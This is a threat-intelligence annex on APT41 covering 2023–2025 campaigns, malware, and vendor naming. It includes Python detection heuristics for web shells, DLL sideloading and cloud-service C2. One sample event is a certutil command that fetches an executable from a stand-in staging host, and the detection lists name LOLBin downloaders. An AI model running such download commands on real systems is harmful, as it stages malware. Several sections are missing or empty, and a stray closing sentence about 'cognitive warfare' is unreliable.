Modus Operandi: APT41 (Double Dragon) Dossier Enrichment Research
Executive Summary
This annex updates the existing APT41 dossier on three axes you prioritized: currency, deployable detection content for the highest-value techniques, and sharper analytic and strategic framing. The three findings below should drive the edits.
Priority 1 — Currency (2023–2026)
1.1 Recent campaigns and geographic / sector shifts
APT41 DUST campaign. Reported by Mandiant / Google Threat Intelligence Group in July 2024. Documented sustained intrusions since 2023 against global shipping and logistics, media and entertainment, technology, and automotive sectors, with a victim majority in Italy, Spain, Taiwan, Thailand, Turkey, and the UK. A useful analytic nuance for the sector/geography matrix: shipping and logistics victims concentrated in Europe and the Middle East, while media and entertainment victims were in Asia, and many shipping victims were subsidiaries of multinationals. Confidence: Documented.
TOUGHPROGRESS / Google Calendar C2. Reported by Google Threat Intelligence Group in May 2025; activity discovered in late October 2024. Attributed to APT41 with high confidence. The chain ran from a spear-phishing link to a ZIP hosted on a compromised government website, an LNK masquerading as a PDF, and three in-memory modules: PLUSDROP (decrypts and loads the next stage in memory), PLUSINJECT (process hollowing into a legitimate svchost.exe), and TOUGHPROGRESS (the Google Calendar C2 implant). C2 used zero-minute calendar events on hardcoded dates, a hardcoded XOR key with per-message keys, and LZNT1 compression. Google disrupted the operation by terminating attacker Workspace projects and Calendar instances and updating Safe Browsing. Victimology scale was not disclosed and should be flagged as an intelligence gap. Confidence: Documented.
Africa expansion. Reported by Kaspersky in July 2025 and attributed to APT41 with high confidence. The case is significant because, in Kaspersky’s own framing, Africa had previously experienced the least activity from this actor. Initial access was via an internet-exposed web server; credentials were harvested through registry dumping, yielding a local-admin domain account and a backup account with domain-admin rights. A captive internal SharePoint server was used as C2 (web shell CommandHandler.aspx) precisely because it was an existing internal service unlikely to raise suspicion. Tooling included Impacket, WMI, Cobalt Strike, and DLL sideloading, with an HTA fetched from a GitHub-impersonating domain. C2 infrastructure overlapped with prior APT41 domains. Confidence: Documented.
RevivalStone. Reported by LAC (Japan) in February 2025, overlapping Trend Micro, Cybereason, and Symantec tracking. A Winnti/APT41 sub-cluster targeting Japanese manufacturing, materials, and energy in March 2024, with references to the TreadStone controller (also present in the i-Soon leak) and a StoneV5 toolset. Confidence: Documented.
Earth Baku. Reported by Trend Micro. An APT41 sub-cluster that since late 2022 expanded from the Indo-Pacific into Europe, the Middle East, and Africa, exploiting public-facing IIS servers. Confidence: Documented.
Activity-volume signal. Trellix reported in April 2025 that China-aligned APT41 showed a 113% increase in activity in Q1 2025 relative to the prior quarter, against a backdrop of sharply rising APT detections overall. Treat as a single-vendor metric indicative of tempo rather than absolute scope. Confidence: Assessed (single source).
1.2 CVEs — with attribution discipline
APT41’s primary documented initial-access vector remains exploitation of public-facing applications, and historically it has been extraordinarily fast. The table separates exploitation genuinely associated with APT41 from CVEs that secondary reporting frequently mislabels as APT41 but that are attributed to other PRC clusters.
1.3 New and updated malware and tooling (2023–2026)
• TOUGHPROGRESS / PLUSDROP / PLUSINJECT (GTIG, May 2025). Google Calendar C2; fully in-memory; process hollowing into svchost.exe. GTIG published matching YARA.
• DodgeBox / MoonWalk (Zscaler, July 2024). DodgeBox is an upgraded StealthVector/DUSTPAN loader using DLL sideloading via a Sandboxie-signed taskhost.exe, call-stack spoofing, DLL hollowing, and environment guardrails. MoonWalk is a backdoor using Google Drive C2 and abusing Windows Fibers for evasion. Attributed to APT41 with medium confidence. Mandiant tracks the same families as DUSTPAN/DUSTTRAP.
• DUSTPAN / DUSTTRAP / BEACON / ANTSWORD / BLUEBEAM / SQLULDR2 / PINEGROVE (Mandiant, July 2024). ANTSWORD and BLUEBEAM web shells on a Tomcat/Apache server led to certutil downloads of DUSTPAN (disguised as w3wp.exe / conn.exe, persisted via a service named “Windows Defend”), which loaded an encrypted BEACON behind Cloudflare, then DUSTTRAP, an in-memory multi-stage plugin framework that trojanizes a legitimate DLL in memory and restores the clean file on disk to evade scans. DUSTTRAP was code-signed with stolen certificates, including one tied to a South Korean gaming company. SQLULDR2 exports Oracle databases; PINEGROVE exfiltrates to OneDrive via the OneDrive API.
• VOLDEMORT (Proofpoint, August 2024). A C backdoor using Google Sheets for C2, attributed to TA415 / APT41 / Brass Typhoon on infrastructure overlap. The campaign ran over 20,000 messages across more than 70 organizations beginning 5 August 2024, impersonating tax authorities across multiple countries, with DLL sideloading via Cisco-branded binaries and a late-August aerospace sub-campaign.
• GC2 (Google TAG, April 2023). Google Sheets and Drive C2 against a Taiwanese media organization — the precursor cloud-C2 case in the multi-year arc.
• Established arsenal still in play. ShadowPad, PlugX, KEYPLUG, Cobalt Strike, MESSAGETAP, and the MoonBounce UEFI implant, with free-hosting distribution (Cloudflare Workers most frequent) observed since at least August 2024.
1.4 Vendor and government naming concordance
Assembling the cross-vendor naming map in one place is exactly the premium differentiation that free vendor blogs rarely provide, and it directly supports the attribution-discipline message.
authorized seizure of accounts, servers, domains, and C2 dead-drop pages executed with major technology providers. No new APT41-specific U.S. or allied government enforcement action exists for 2023–2026; the March 2025 indictment of twelve Chinese nationals concerns i-Soon and APT27/Silk Typhoon, not APT41. This is a verified negative finding the dossier should state plainly.
1.5 i-Soon and the contractor ecosystem
The i-Soon document leak of February 2024 (roughly 570 documents) supplies primary-source corroboration of the contractor ecosystem surrounding APT41. Analysts concluded the leak reveals how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire, with i-Soon contracting to the MSS, MPS, and PLA, and showing support for ShadowPad development. Chengdu 404, the front named in the APT41 indictment, is connected to i-Soon through litigation and a likely subcontractor relationship — both Chengdu-based. This is direct corroboration of the dossier’s dual-mandate and contractor model, although i-Soon’s own intrusions should not be equated with APT41.
Priority 2 — Detection Engineering (Big Hitters)
Each technique below provides a Sigma rule, an equivalent or complementary KQL query for Microsoft Defender XDR / Sentinel Advanced Hunting, and false-positive and tuning notes. The rules are behavior-based (parent/child relationships, LOLBins, cloud-C2 patterns) rather than IOC-based, so they survive infrastructure churn. The cloud-service C2 analytic in section 2.5 is the single highest-value modern addition.
2.1 Web-shell child-process anomaly (T1505.003 / T1190)
Grounded in ANTSWORD/BLUEBEAM on Tomcat (DUST campaign, 2023) and CommandHandler.aspx on SharePoint (Africa, 2025).
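The behavioural core of this rule is the parent/child pairing: a web-server worker should not spawn a shell, a LOLBin downloader or host-recon tooling. The following is an added example, not the annex's own Sigma or KQL content, that runs that heuristic over constructed Sysmon-style process-creation events. The parent and child image sets, the allowlist entry and the sample command lines are assumptions to tune per estate.

```python
"""Web-shell child-process anomaly (T1505.003 / T1190).

Added example, not the annex's own Sigma/KQL content: a parent/child
heuristic run over constructed Sysmon-style process-creation events.
A web-server worker (IIS/SharePoint w3wp.exe, Tomcat's java.exe, Apache
httpd.exe) has no business spawning a shell, a LOLBin downloader or
host-recon tooling; that pairing is the behavioural core of the rule.
"""
from dataclasses import dataclass

# Parent images that execute server-side code (assumed set; extend per estate).
WEB_WORKERS = {"w3wp.exe", "java.exe", "tomcat9.exe", "httpd.exe"}

# Child images indicating interactive shell use or staging from a web worker.
# certutil.exe is included because the annex documents DUSTPAN being fetched
# with certutil from the ANTSWORD/BLUEBEAM web shells.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "whoami.exe", "net.exe", "net1.exe", "nltest.exe", "wmic.exe",
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "tasklist.exe",
}

# Known-benign pairings to suppress, as (parent, child, command-line fragment).
# Constructed tuning entry: an app that shells out for a scripted health check.
ALLOWLIST = {("java.exe", "cmd.exe", "healthcheck.bat")}


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(ev: ProcEvent) -> bool:
    """True when a web worker spawns a shell/LOLBin and no allowlist entry matches."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent not in WEB_WORKERS or child not in SUSPICIOUS_CHILDREN:
        return False
    cmd = ev.command_line.lower()
    return not any(parent == p and child == c and frag in cmd
                   for p, c, frag in ALLOWLIST)


def find_webshell_children(events):
    """Return the events matching the web-worker -> shell/LOLBin heuristic."""
    return [ev for ev in events if is_suspicious(ev)]


# Constructed sample events (not real telemetry). 203.0.113.10 is a
# documentation-range address standing in for a staging host.
SAMPLE_EVENTS = [
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f http://203.0.113.10/conn.exe conn.exe"),
    ProcEvent("app02", r"C:\Tomcat\bin\java.exe",
              r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\app\healthcheck.bat"),
    ProcEvent("ws03", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for hit in find_webshell_children(SAMPLE_EVENTS):
        print(f"[ALERT] {hit.host}: {basename(hit.parent_image)} -> "
              f"{basename(hit.image)} :: {hit.command_line}")
```

The allowlist is keyed on the full triple (parent, child, command-line fragment) rather than on the child alone, so a legitimate health-check script does not silence every cmd.exe spawned by the same Tomcat process.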
2.4 Code-signing abuse and DLL-sideload pairs (T1553.002 / T1574.002)
Grounded in DUSTTRAP stolen certificates and specific sideloading host/payload pairs.
Tuning. A generic “signed binary from a user-writable path” rule is high-FP (Teams, updaters), so prioritize the actual APT41 host/payload pairs and validate by load path and DLL signature. Where certificate telemetry is available, hunt signed-but-revoked binaries and unusual issuers, including the stolen DUSTTRAP certificate if your intelligence feed carries its serial.
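The tuning note above argues for requiring the sideload shape itself rather than alerting on every signed binary in a user-writable path. The following is an added example, not the annex's own rule content, that applies that logic over constructed Sysmon-style image-load events and also flags any load carrying a revoked signature. The user-writable path pattern, the benign-updater allowlist, the signer names and the file names are constructed placeholders, not the real DodgeBox or DUSTTRAP artefacts.

```python
"""DLL sideload-pair and certificate-status check (T1574.002 / T1553.002).

Added example, not the annex's own rule content: a heuristic over constructed
Sysmon-style image-load events. Rather than alerting on every signed binary in
a user-writable path (high-FP: Teams, updaters), it requires the sideload
shape itself: a signed host executable running from a user-writable directory
loads a DLL from that same directory, and the DLL is unsigned or carries a
different signer. Independently, any load with a revoked signature is flagged,
as the annex suggests for estates with certificate telemetry.
"""
from dataclasses import dataclass
import re

# Assumed user-writable roots; extend with per-estate paths.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\|programdata\\|windows\\temp\\)", re.IGNORECASE)

# Benign self-updating applications that legitimately run signed code from
# AppData, keyed by (signer, path fragment). Constructed tuning entry.
KNOWN_BENIGN = [("microsoft corporation", "\\appdata\\local\\microsoft\\teams\\")]


@dataclass(frozen=True)
class ImageLoad:
    host: str
    process_path: str
    process_signer: str      # "" when unsigned
    process_sig_status: str  # "valid", "unsigned", "revoked", "expired"
    dll_path: str
    dll_signer: str
    dll_sig_status: str


def dirname(path: str) -> str:
    return path.lower().rsplit("\\", 1)[0]


def is_user_writable(path: str) -> bool:
    return USER_WRITABLE.match(path) is not None


def classify(ev: ImageLoad):
    """Return a reason string for a suspicious load, or None."""
    if "revoked" in (ev.process_sig_status, ev.dll_sig_status):
        return "binary signed with a revoked certificate"
    if ev.process_sig_status != "valid" or not is_user_writable(ev.process_path):
        return None
    # Sideloading relies on the host's own directory winning DLL search order.
    if dirname(ev.process_path) != dirname(ev.dll_path):
        return None
    proc_path = ev.process_path.lower()
    if any(ev.process_signer.lower() == s and frag in proc_path
           for s, frag in KNOWN_BENIGN):
        return None
    if ev.dll_sig_status != "valid":
        return "signed host in user-writable path loaded an unsigned/invalid DLL beside it"
    if ev.dll_signer.lower() != ev.process_signer.lower():
        return f"signer mismatch: host '{ev.process_signer}' vs DLL '{ev.dll_signer}'"
    return None


def find_sideloads(events):
    """Pair each suspicious event with its reason."""
    return [(ev, reason) for ev in events if (reason := classify(ev))]


# Constructed samples. Signer names and file names are placeholders.
SAMPLE_LOADS = [
    ImageLoad("ws01", r"C:\Users\alice\AppData\Local\Temp\taskhost.exe",
              "Example Sandbox Vendor", "valid",
              r"C:\Users\alice\AppData\Local\Temp\helper.dll", "", "unsigned"),
    ImageLoad("ws01", r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe",
              "Microsoft Corporation", "valid",
              r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\ffmpeg.dll",
              "", "unsigned"),
    ImageLoad("ws02", r"C:\Windows\System32\svchost.exe",
              "Microsoft Windows", "valid",
              r"C:\Windows\System32\wininet.dll", "Microsoft Windows", "valid"),
    ImageLoad("srv01", r"C:\inetsrv\conn.exe", "Placeholder Signer Co", "revoked",
              r"C:\Windows\System32\kernel32.dll", "Microsoft Windows", "valid"),
]

if __name__ == "__main__":
    for ev, reason in find_sideloads(SAMPLE_LOADS):
        print(f"[ALERT] {ev.host}: {ev.process_path} -> {ev.dll_path}: {reason}")
```

The revoked-certificate branch runs before the path filter on purpose: a stolen certificate that has since been revoked is worth a look wherever the binary sits, whereas the sideload heuristic only makes sense in directories an attacker can write to.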
2.5 Cloud-service C2 beaconing — Calendar / Sheets / Drive / OneDrive
Grounded in TOUGHPROGRESS (Calendar), VOLDEMORT (Sheets), MoonWalk (Drive), and PINEGROVE (OneDrive). This is APT41’s defining modern tradecraft and the highest-value analytic in this annex.
Tuning. The destination is legitimate, so anchor on the process, not the domain. For TOUGHPROGRESS the caller is an injected svchost.exe with odd service-host arguments; for VOLDEMORT it is a sideloaded DLL host. Add beaconing-regularity logic (low jitter, fixed-interval polling). For Workspace and M365 tenants, hunt OAuth consent grants and refresh-token use by non-standard client IDs, and time-series anomalies on a service principal’s Graph or Drive API volume.
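Because the destination is a legitimate Google Workspace or Microsoft 365 endpoint, the analytic has to anchor on the calling process and on polling regularity. The following is an added example, not the annex's own Sigma or KQL, that does both over constructed network-connection events: it groups non-browser, non-sync-client connections to cloud API hosts per process, applies a service-host argument check, and measures inter-connection jitter. The domain set, the browser and sync-client allowlists, the svchost `-k` heuristic and the sample telemetry are assumptions to tune per estate.

```python
"""Cloud-service C2 beaconing hunt (Calendar / Sheets / Drive / OneDrive).

Added example, not the annex's own Sigma/KQL: the destination is a legitimate
Google Workspace or Microsoft 365 endpoint, so this anchors on the calling
process and on polling regularity, over constructed network-connection events.
The domain set, the browser/sync-client allowlists and the svchost argument
heuristic are assumptions to tune per estate.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
import statistics

# Workspace / M365 API endpoints that the documented implants abuse (assumed set).
CLOUD_API_HOSTS = {
    "calendar.google.com", "www.googleapis.com", "sheets.googleapis.com",
    "drive.google.com", "docs.google.com", "graph.microsoft.com",
    "onedrive.live.com", "api.onedrive.com",
}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Endpoint clients that legitimately sync with these services (tune per estate).
SYNC_CLIENTS = {"onedrive.exe", "outlook.exe", "teams.exe", "googledrivefs.exe"}


@dataclass(frozen=True)
class NetEvent:
    ts: datetime
    host: str
    image: str
    pid: int
    command_line: str
    dest_host: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def beacon_regularity(timestamps, min_events=6, max_cv=0.2):
    """(regular, mean_interval_s, cv): a low coefficient of variation of the
    inter-connection gaps means fixed-interval polling with little jitter."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return False, 0.0, float("inf")
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
    return cv <= max_cv, mean, cv


def hunt(events):
    """Group non-browser, non-sync-client connections to cloud API hosts per
    process and explain why each group is suspicious."""
    groups = defaultdict(list)
    for ev in events:
        image = basename(ev.image)
        if ev.dest_host.lower() not in CLOUD_API_HOSTS:
            continue
        if image in BROWSERS or image in SYNC_CLIENTS:
            continue
        groups[(ev.host, image, ev.pid, ev.dest_host.lower())].append(ev)

    findings = []
    for (host, image, pid, dest), evs in groups.items():
        reasons = [f"non-browser process {image} (pid {pid}) reached {dest}"]
        # A service-hosted svchost.exe is launched by services.exe with
        # "-k <group>"; an injected/hollowed one often is not (assumption).
        if image == "svchost.exe" and not any("-k " in e.command_line for e in evs):
            reasons.append("svchost.exe without a -k service-group argument")
        regular, mean, cv = beacon_regularity(e.ts for e in evs)
        if regular:
            reasons.append(f"fixed-interval polling: {len(evs)} connections, "
                           f"mean {mean:.0f}s, cv {cv:.3f}")
        findings.append((host, image, pid, dest, reasons))
    return findings


# Constructed sample telemetry: a hollowed svchost polling Calendar every
# ~300 s with a few seconds of jitter, a browser session, and a sync client.
T0 = datetime(2025, 1, 15, 9, 0, 0)
SAMPLE_EVENTS = [
    NetEvent(T0 + timedelta(seconds=300 * i + j), "ws07",
             r"C:\Windows\System32\svchost.exe", 4412, "svchost.exe",
             "calendar.google.com")
    for i, j in enumerate([0, 1, -1, 2, 0, 1, -2, 1])
] + [
    NetEvent(T0 + timedelta(seconds=s), "ws07",
             r"C:\Program Files\Google\Chrome\Application\chrome.exe", 2210,
             "chrome.exe", "calendar.google.com")
    for s in (5, 17, 95, 410, 1300)
] + [
    NetEvent(T0 + timedelta(seconds=60 * i), "ws07",
             r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe", 3100,
             "OneDrive.exe /background", "graph.microsoft.com")
    for i in range(10)
]

if __name__ == "__main__":
    for host, image, pid, dest, reasons in hunt(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: " + "; ".join(reasons))
```

The regularity score is deliberately separate from the process filter: a sync client polling every 60 s is regular but allowlisted, while an unexpected process reaching a cloud API is reported even when it has not yet produced enough connections to score, so the hunt degrades gracefully on short retention windows.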
2.6 Exfiltration to cloud storage — OneDrive via PINEGROVE (T1567.002)
2.7 Service persistence — DUSTPAN service masquerade (T1543.003)
Priority 3 — Analytic and Strategic Depth
3.1 Contractor / dual-mandate model — upgrade toward Documented
The original dossier likely frames the contractor and dual-mandate model as an assessment. The i-Soon leak of February 2024 now supplies primary-source corroboration of the surrounding ecosystem, showing how government targeting requirements drive a competitive marketplace of contractor hackers-for-hire. With Chengdu 404 (the named APT41 front) tied by litigation to i-Soon, the framing can move from assessed toward documented, citing i-Soon as a structural analogue for how MSS and MPS tasking, target lists, and tool-sharing flow through Chengdu-based contractors — while being careful not to equate i-Soon’s own intrusions with APT41.
3.2 Cloud / SaaS / identity persistence — upgrade Watch item to Documented
Any prior treatment of cloud-fronted C2 as a watch item is now superseded. Cloud and SaaS C2 is documented for APT41 specifically across a multi-year arc: Google Sheets and Drive via GC2 (April 2023), Google Workspace and OneDrive via DUSTTRAP and PINEGROVE (July 2024), Google Sheets via VOLDEMORT (August 2024), Google Drive via MoonWalk (July 2024), and Google Calendar via TOUGHPROGRESS (discovered October 2024, disclosed May 2025). This is APT41’s defining 2023–2025 evolution and should be elevated to a top-line finding, paired with the detection logic in section 2.5.
3.3 PRC landscape — situate APT41 against the Typhoon clusters
APT41 (Brass Typhoon / Barium) is distinct from the clusters most often confused with it. The dossier should state these de-conflictions explicitly, because aggregator blogs frequently mislabel their activity as APT41.
• Volt Typhoon — OT and critical-infrastructure pre-positioning, living-off-the-land, multi-year dwell, SOHO-router proxying.
• Salt Typhoon — telecom and ISP intrusion and metadata theft (GhostSpider, Demodex rootkit). Some vendors loosely label this “APT41/Barium”; that is imprecise.
• Silk Typhoon (APT27 / Hafnium) — IT supply chain, stolen API keys, MSP and RMM abuse; named in the March 2025 DOJ action. Distinct from APT41.
• Linen Typhoon (APT27), Violet Typhoon (APT31), Storm-2603 — the SharePoint ToolShell exploiters. Distinct from APT41.
• UNC5221 — the Ivanti edge-appliance specialist. Distinct from APT41 and not yet promoted to a named APT.
3.4 AI-assisted operations — strategic outlook only, not APT41
3.5 Analytic gaps to tighten or qualify
• Tighten: cloud C2 from watch item to documented (3.2).
• Tighten: the contractor and dual-mandate model with i-Soon primary-source evidence (3.1).
• Tighten: add the cross-vendor naming concordance and de-confliction table (1.4, 3.3).
• Qualify: do not attribute the Ivanti or SharePoint ToolShell CVEs to APT41 (1.2).
• Qualify: state plainly that no new DOJ or sanctions action exists since 2020.
• Qualify: the Chrome V8 CVE-2025-6554 link to APT41 is secondary-sourced and low-confidence.
• Gap: TOUGHPROGRESS victimology scale is unclear; the disclosing vendor declined specifics.
Recommendations (Staged, with Revisit Thresholds)
Stage 1 — Immediate editorial fixes (currency and correctness)
1. Insert a new top-line section on cloud and SaaS C2 as APT41’s defining 2023–2025 tradecraft (TOUGHPROGRESS, VOLDEMORT, MoonWalk, DUSTTRAP), with the section 2.5 detection logic attached.
2. Add the Africa government-IT case (Kaspersky, July 2025) and the DUST campaign (Mandiant, July 2024) to the campaign timeline and the sector/geography matrix.
3. Insert the attribution-discipline box: correct any APT41 labeling of the Ivanti (UNC5221) and SharePoint ToolShell (APT27/APT31/Storm-2603) CVEs.
4. Update the legal section to state the verified negative finding — no post-2020 APT41 action.
Revisit threshold: if a new indictment, sanction, or government advisory explicitly names APT41 or Brass Typhoon, promote it from a negative finding to a dedicated section.
Stage 2 — Detection content (deployable)
Ship the section 2.1–2.7 Sigma and KQL as a big-hitter pack, leading with the chained web-shell to archive to cloud-egress analytic (2.1) and the non-browser cloud-C2 analytic (2.5). Pair each with its false-positive and tuning notes, and layer vendor YARA for TOUGHPROGRESS as secondary IOC coverage.
Revisit threshold: if telemetry lacks image-load events or proxy logs, prioritize the process-creation rules (2.1–2.4, 2.7) and the OAuth and cloud-app hunts.
Stage 3 — Strategic framing
Add the i-Soon contractor analysis (3.1), the Typhoon de-confliction table (3.3), and an AI-outlook box clearly fenced from APT41 attribution (3.4).
Revisit threshold: if a vendor publishes APT41-specific AI-tooling evidence, upgrade section 3.4 from outlook to a documented finding.
How about the new cognitive warfare neutralizing target by applying friction in the prescription layer of the target.
Thank you for making this material available.